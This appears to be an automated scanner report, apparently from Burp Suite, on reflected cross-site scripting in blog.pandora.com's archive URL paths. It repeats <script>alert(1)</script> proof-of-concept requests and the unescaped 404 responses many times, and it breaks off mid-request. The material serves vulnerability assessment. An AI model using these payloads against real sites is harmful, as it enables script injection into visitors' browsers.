The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73e85<script>alert(1)</script>ab709179510 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora73e85<script>alert(1)</script>ab709179510/archives/2005/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52080<script>alert(1)</script>69601ecbd83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives52080<script>alert(1)</script>69601ecbd83/2005/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f1a55<script>alert(1)</script>2930f5de171 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:29 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005f1a55<script>alert(1)</script>2930f5de171/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f891c<script>alert(1)</script>910256c07c6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/11f891c<script>alert(1)</script>910256c07c6/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 812a3<script>alert(1)</script>4963365f5f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora812a3<script>alert(1)</script>4963365f5f1/archives/2005/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb8f3<script>alert(1)</script>2960d34c74e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbb8f3<script>alert(1)</script>2960d34c74e/2005/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97499<script>alert(1)</script>74af091ba5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200597499<script>alert(1)</script>74af091ba5d/12/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d6250<script>alert(1)</script>f5b95efae30 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2005/12d6250<script>alert(1)</script>f5b95efae30/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 176cf<script>alert(1)</script>b4e0ebb55d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora176cf<script>alert(1)</script>b4e0ebb55d/archives/2006/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4d2d<script>alert(1)</script>1fffc06b069 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa4d2d<script>alert(1)</script>1fffc06b069/2006/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5cfe<script>alert(1)</script>3585d67671d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006b5cfe<script>alert(1)</script>3585d67671d/01/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86220<script>alert(1)</script>bfa750f2e3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/0186220<script>alert(1)</script>bfa750f2e3a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37767<script>alert(1)</script>96a3bdaf0ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora37767<script>alert(1)</script>96a3bdaf0ab/archives/2006/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bb5d<script>alert(1)</script>6b31a0b7960 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5bb5d<script>alert(1)</script>6b31a0b7960/2006/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 654b6<script>alert(1)</script>c48ada1686b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006654b6<script>alert(1)</script>c48ada1686b/02/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5aa91<script>alert(1)</script>9eb948f65af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2006/025aa91<script>alert(1)</script>9eb948f65af/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d88f4<script>alert(1)</script>a463141d672 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad88f4<script>alert(1)</script>a463141d672/archives/2006/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 970b7<script>alert(1)</script>535a013270b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives970b7<script>alert(1)</script>535a013270b/2006/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35243<script>alert(1)</script>cbe6a64b700 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:07:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200635243<script>alert(1)</script>cbe6a64b700/03/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5e7ab<script>alert(1)</script>fa977886cf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2006/035e7ab<script>alert(1)</script>fa977886cf6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
